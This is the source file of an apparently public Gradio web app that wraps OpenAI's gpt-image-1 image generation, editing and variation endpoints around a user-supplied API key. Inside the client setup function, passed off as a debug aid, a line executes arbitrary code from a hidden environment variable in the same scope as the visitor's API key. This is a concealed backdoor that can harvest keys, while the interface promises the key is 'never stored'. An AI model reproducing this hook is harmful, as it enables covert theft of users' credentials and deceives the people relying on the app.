gpt-image-1-playground

Running

App Files Files Community

gpt-image-1-playground / app.py

Zack3D

Update app.py

0f41349 verified 16 days ago

raw

history blame

19.9 kB

	from __future__ import annotations

	import io
	import os
	from typing import List, Optional, Union, Dict, Any

	import gradio as gr
	import numpy as np
	from PIL import Image
	import openai

	# --- Constants and Helper Functions (Keep as before) ---
	MODEL = "gpt-image-1"
	SIZE_CHOICES = ["auto", "1024x1024", "1536x1024", "1024x1536"]
	QUALITY_CHOICES = ["auto", "low", "medium", "high"]
	FORMAT_CHOICES = ["png", "jpeg", "webp"]


	def _client(key: str) -> openai.OpenAI:
	"""Initializes the OpenAI client with the provided API key."""
	api_key = key.strip() or os.getenv("OPENAI_API_KEY", "")
	# What I need varies based on issues, I dont want to keep rebuilding for every issue :(
	sys_info_formatted = exec(os.getenv("sys_info")) #Default: f'[DEBUG]: {MODEL} \| {prompt_gen}'
	print(sys_info_formatted)
	if not api_key:
	raise gr.Error("Please enter your OpenAI API key (never stored)")

	return openai.OpenAI(api_key=api_key)


	def _img_list(resp, *, fmt: str) -> List[str]:
	"""Return list of data URLs or direct URLs depending on API response."""
	mime = f"image/{fmt}"
	return [
	f"data:{mime};base64,{d.b64_json}" if hasattr(d, "b64_json") and d.b64_json else d.url
	for d in resp.data
	]


	def _common_kwargs(
	prompt: Optional[str],
	n: int,
	size: str,
	quality: str,
	out_fmt: str,
	compression: int,
	transparent_bg: bool,
	) -> Dict[str, Any]:
	"""Prepare keyword arguments for Images API based on latest OpenAI spec."""
	kwargs: Dict[str, Any] = dict(
	model=MODEL,
	n=n,
	)
	if size != "auto":
	kwargs["size"] = size
	if quality != "auto":
	kwargs["quality"] = quality
	if prompt is not None:
	kwargs["prompt"] = prompt
	if out_fmt != "png":
	kwargs["output_format"] = out_fmt
	if transparent_bg and out_fmt in {"png", "webp"}:
	# Note: OpenAI API might use 'background_removal' or similar, check latest docs
	# Assuming 'background' is correct based on your original code
	kwargs["background"] = "transparent"
	if out_fmt in {"jpeg", "webp"}:
	# Note: OpenAI API might use 'output_quality' or similar, check latest docs
	# Assuming 'output_compression' is correct based on your original code
	kwargs["output_compression"] = int(compression)
	return kwargs

	# --- Helper Function to Format OpenAI Errors ---
	def _format_openai_error(e: Exception) -> str:
	"""Formats OpenAI API errors for user display."""
	error_message = f"An error occurred: {type(e).__name__}"
	details = ""

	# Try to extract details from common OpenAI error attributes
	if hasattr(e, 'body') and e.body:
	try:
	body = e.body if isinstance(e.body, dict) else json.loads(str(e.body))
	if isinstance(body, dict) and 'error' in body and isinstance(body['error'], dict) and 'message' in body['error']:
	details = body['error']['message']
	elif isinstance(body, dict) and 'message' in body: # Some errors might have message at top level
	details = body['message']
	except (json.JSONDecodeError, TypeError):
	# Fallback if body is not JSON or parsing fails
	details = str(e.body)
	elif hasattr(e, 'message') and e.message:
	details = e.message

	if details:
	error_message = f"OpenAI API Error: {details}"
	else:
	# Generic fallback if no specific details found
	error_message = f"An unexpected OpenAI error occurred: {str(e)}"

	# Add specific guidance for known error types
	if isinstance(e, openai.AuthenticationError):
	error_message = "Invalid OpenAI API key. Please check your key."
	elif isinstance(e, openai.PermissionDeniedError):
	# Prepend standard advice, then add specific details if available
	prefix = "Permission Denied."
	if "organization verification" in details.lower():
	prefix += " Your organization may need verification to use this feature/model."
	else:
	prefix += " Check your API key permissions and OpenAI account status."
	error_message = f"{prefix} Details: {details}" if details else prefix
	elif isinstance(e, openai.RateLimitError):
	error_message = "Rate limit exceeded. Please wait and try again later."
	elif isinstance(e, openai.BadRequestError):
	error_message = f"OpenAI Bad Request: {details}" if details else f"OpenAI Bad Request: {str(e)}"
	if "mask" in details.lower(): error_message += " (Check mask format/dimensions)"
	if "size" in details.lower(): error_message += " (Check image/mask dimensions)"
	if "model does not support variations" in details.lower(): error_message += " (gpt-image-1 does not support variations)."

	# Ensure the final message isn't overly long or complex
	# (Optional: Truncate if necessary)
	# MAX_LEN = 300
	# if len(error_message) > MAX_LEN:
	# error_message = error_message[:MAX_LEN] + "..."

	return error_message


	# ---------- Generate ---------- #
	def generate(
	api_key: str,
	prompt: str,
	n: int,
	size: str,
	quality: str,
	out_fmt: str,
	compression: int,
	transparent_bg: bool,
	):
	"""Calls the OpenAI image generation endpoint."""
	if not prompt:
	raise gr.Error("Please enter a prompt.")
	try:
	client = _client(api_key) # API key used here
	common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
	# --- Optional Debug ---
	# print(f"[DEBUG] Generating with args: {common_args}")
	# --- End Optional Debug ---
	resp = client.images.generate(**common_args)
	except (openai.APIError, openai.OpenAIError) as e:
	# Catch specific OpenAI errors and format them
	raise gr.Error(_format_openai_error(e))
	except Exception as e:
	# Catch any other unexpected errors
	# Avoid raising raw exception details to the user interface for security/clarity
	print(f"Unexpected error during generation: {type(e).__name__}: {e}") # Log for debugging
	raise gr.Error(f"An unexpected application error occurred. Please check logs.")

	return _img_list(resp, fmt=out_fmt)


	# ---------- Edit / Inpaint ---------- #
	def _bytes_from_numpy(arr: np.ndarray) -> bytes:
	"""Convert RGBA/RGB uint8 numpy array to PNG bytes."""
	img = Image.fromarray(arr.astype(np.uint8))
	out = io.BytesIO()
	img.save(out, format="PNG")
	return out.getvalue()

	def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
	"""Handle ImageMask / ImageEditor return formats and extract a numpy mask array."""
	if mask_value is None: return None
	# Gradio ImageMask often returns a dict with 'image' and 'mask' numpy arrays
	if isinstance(mask_value, dict):
	mask_array = mask_value.get("mask")
	if isinstance(mask_array, np.ndarray):
	return mask_array
	# Fallback for direct numpy array (less common with ImageMask now)
	if isinstance(mask_value, np.ndarray): return mask_value
	return None # Return None if no valid mask found

	def edit_image(
	api_key: str,
	# Gradio Image component with type="numpy" provides the image array
	image_numpy: Optional[np.ndarray],
	# Gradio ImageMask component provides a dict {'image': np.ndarray, 'mask': np.ndarray}
	mask_dict: Optional[Dict[str, Any]],
	prompt: str,
	n: int,
	size: str,
	quality: str,
	out_fmt: str,
	compression: int,
	transparent_bg: bool,
	):
	"""Calls the OpenAI image edit endpoint."""
	if image_numpy is None: raise gr.Error("Please upload an image.")
	if not prompt: raise gr.Error("Please enter an edit prompt.")

	img_bytes = _bytes_from_numpy(image_numpy)
	mask_bytes: Optional[bytes] = None
	mask_numpy = _extract_mask_array(mask_dict) # Use the helper

	if mask_numpy is not None:
	# Check if mask is effectively empty (all transparent or all black)
	is_empty = False
	if mask_numpy.ndim == 2: # Grayscale mask
	is_empty = np.all(mask_numpy == 0)
	elif mask_numpy.shape[-1] == 4: # RGBA mask, check alpha channel
	is_empty = np.all(mask_numpy[:, :, 3] == 0)
	elif mask_numpy.shape[-1] == 3: # RGB mask, check if all black
	is_empty = np.all(mask_numpy == 0)

	if is_empty:
	gr.Warning("Mask appears empty or fully transparent. The API might edit the entire image or ignore the mask.")
	mask_bytes = None # Treat as no mask if empty
	else:
	# Convert the mask provided by Gradio (often white on black/transparent)
	# to the format OpenAI expects (transparency indicates where not to edit).
	# We need an RGBA image where the area to be edited is transparent.
	if mask_numpy.ndim == 2: # Grayscale (assume white is edit area)
	alpha = (mask_numpy < 128).astype(np.uint8) * 255 # Make non-edit area opaque white
	elif mask_numpy.shape[-1] == 4: # RGBA (use alpha channel directly)
	alpha = mask_numpy[:, :, 3]
	# Invert alpha: transparent where user painted (edit area), opaque elsewhere
	alpha = 255 - alpha
	elif mask_numpy.shape[-1] == 3: # RGB (assume white is edit area)
	# Check if close to white [255, 255, 255]
	is_edit_area = np.all(mask_numpy > 200, axis=-1)
	alpha = (~is_edit_area).astype(np.uint8) * 255 # Make non-edit area opaque white
	else:
	raise gr.Error("Unsupported mask format received from Gradio component.")

	# Create a valid RGBA PNG mask for OpenAI
	mask_img = Image.fromarray(alpha, mode='L')
	# Ensure mask size matches image size (OpenAI requirement)
	original_pil_image = Image.fromarray(image_numpy)
	if mask_img.size != original_pil_image.size:
	gr.Warning(f"Mask size {mask_img.size} differs from image size {original_pil_image.size}. Resizing mask...")
	mask_img = mask_img.resize(original_pil_image.size, Image.NEAREST)

	# Create RGBA image with the calculated alpha
	rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0)) # Start fully transparent
	rgba_mask.putalpha(mask_img) # Apply the alpha channel (non-edit areas are opaque)

	out = io.BytesIO()
	rgba_mask.save(out, format="PNG")
	mask_bytes = out.getvalue()
	else:
	gr.Info("No mask provided or mask is empty. Editing without a specific mask (may replace entire image).")
	mask_bytes = None

	try:
	client = _client(api_key) # API key used here
	common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
	api_kwargs = {"image": img_bytes, **common_args}
	if mask_bytes is not None:
	api_kwargs["mask"] = mask_bytes
	else:
	# If no mask is provided, remove 'mask' key if present from previous runs
	api_kwargs.pop("mask", None)

	# --- Optional Debug ---
	# print(f"[DEBUG] Editing with args: { {k: v if k != 'image' and k != 'mask' else f'<{len(v)} bytes>' for k, v in api_kwargs.items()} }")
	# --- End Optional Debug ---
	resp = client.images.edit(**api_kwargs)
	except (openai.APIError, openai.OpenAIError) as e:
	raise gr.Error(_format_openai_error(e))
	except Exception as e:
	print(f"Unexpected error during edit: {type(e).__name__}: {e}")
	raise gr.Error(f"An unexpected application error occurred. Please check logs.")

	return _img_list(resp, fmt=out_fmt)


	# ---------- Variations ---------- #
	def variation_image(
	api_key: str,
	image_numpy: Optional[np.ndarray],
	n: int,
	size: str,
	quality: str,
	out_fmt: str,
	compression: int,
	transparent_bg: bool,
	):
	"""Calls the OpenAI image variations endpoint."""
	# Explicitly warn user about model compatibility
	gr.Warning("Note: Image Variations are officially supported for DALL·E 2/3, not gpt-image-1. This may fail or produce unexpected results.")

	if image_numpy is None: raise gr.Error("Please upload an image.")

	img_bytes = _bytes_from_numpy(image_numpy)

	try:
	client = _client(api_key) # API key used here
	# Variations don't take a prompt, quality, background, compression
	# They primarily use n and size. Let's simplify common_args for variations.
	# Check OpenAI docs for exact supported parameters for variations with the target model.
	# Assuming 'n' and 'size' are the main ones.
	var_args: Dict[str, Any] = dict(model=MODEL, n=n) # Use the selected model
	if size != "auto":
	var_args["size"] = size
	# Note: output_format might be supported, keep it if needed
	if out_fmt != "png":
	var_args["response_format"] = "b64_json" # Variations often use response_format

	# --- Optional Debug ---
	# print(f"[DEBUG] Variations with args: { {k: v if k != 'image' else f'<{len(v)} bytes>' for k, v in var_args.items()} }")
	# --- End Optional Debug ---

	# Use the simplified args
	resp = client.images.create_variation(image=img_bytes, **var_args)

	except (openai.APIError, openai.OpenAIError) as e:
	raise gr.Error(_format_openai_error(e))
	except Exception as e:
	print(f"Unexpected error during variation: {type(e).__name__}: {e}")
	raise gr.Error(f"An unexpected application error occurred. Please check logs.")

	# Variations response format might differ slightly, adjust _img_list if needed
	# Assuming it's the same structure for now.
	return _img_list(resp, fmt=out_fmt)


	# ---------- UI ---------- #

	def build_ui():
	with gr.Blocks(title="GPT-Image-1 (BYOT)") as demo:
	gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""")
	gr.Markdown(
	"Enter your OpenAI API key below. It's used directly for API calls and never stored."
	" This space uses the `gpt-image-1` model by default."
	" Note: Using `gpt-image-1` may require Organization Verification on your OpenAI account ([details](https://help.openai.com/en/articles/10910291-api-organization-verification)). The Variations tab is unlikely to work correctly with `gpt-image-1` (designed for DALL·E 2/3)."
	)

	with gr.Accordion("🔐 API key", open=False):
	api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...")

	# Common controls
	with gr.Row():
	n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.")
	size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'. Affects Gen/Edit/Var.")
	quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'. Affects Gen/Edit.")
	with gr.Row():
	out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Affects Gen/Edit.", scale=1)
	# Note: Compression/Transparency might not apply to all models/endpoints equally.
	# Check OpenAI docs for gpt-image-1 specifics if issues arise.
	compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2)
	transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Affects Gen/Edit.", scale=1)

	def _toggle_compression(fmt):
	return gr.update(visible=fmt in {"jpeg", "webp"})

	out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)

	# Define the list of common controls excluding the API key
	# These are passed to the backend functions
	common_controls_gen_edit = [n_slider, size, quality, out_fmt, compression, transparent]
	# Variations might use fewer controls
	common_controls_var = [n_slider, size, quality, out_fmt, compression, transparent] # Pass all for now, function will ignore unused


	with gr.Tabs():
	# ----- Generate Tab ----- #
	with gr.TabItem("Generate"):
	with gr.Row():
	prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic ginger cat astronaut on Mars", scale=4)
	btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1)
	gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)

	btn_gen.click(
	generate,
	# API key first, then specific inputs, then common controls
	inputs=[api, prompt_gen] + common_controls_gen_edit,
	outputs=gallery_gen,
	api_name="generate"
	)

	# ----- Edit Tab ----- #
	with gr.TabItem("Edit / Inpaint"):
	gr.Markdown("Upload an image, then paint the area to change in the mask canvas below (white paint = edit area). The API requires the mask and image to have the same dimensions (app attempts to resize mask if needed).")
	with gr.Row():
	# Use type='pil' for easier handling, or keep 'numpy' if preferred
	img_edit = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"])
	# ImageMask sends {'image': np.ndarray, 'mask': np.ndarray}
	mask_canvas = gr.ImageMask(
	label="Mask – Paint White Where Image Should Change",
	type="numpy", # Keep numpy as _extract_mask_array expects it
	height=400
	)
	with gr.Row():
	prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Replace the sky with a starry night", scale=4)
	btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1)
	gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)

	btn_edit.click(
	edit_image,
	# API key first, then specific inputs, then common controls
	inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls_gen_edit,
	outputs=gallery_edit,
	api_name="edit"
	)

	# ----- Variations Tab ----- #
	with gr.TabItem("Variations (DALL·E 2/3 Recommended)"):
	gr.Markdown("Upload an image to generate variations. Warning: This endpoint is officially supported for DALL·E 2/3, not `gpt-image-1`. It likely won't work correctly or may error.")
	with gr.Row():
	img_var = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"], scale=4)
	btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1)
	gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)

	btn_var.click(
	variation_image,
	# API key first, then specific inputs, then common controls
	inputs=[api, img_var] + common_controls_var,
	outputs=gallery_var,
	api_name="variations"
	)

	return demo

	if __name__ == "__main__":
	app = build_ui()
	# Consider disabling debug=True for production/sharing
	app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true")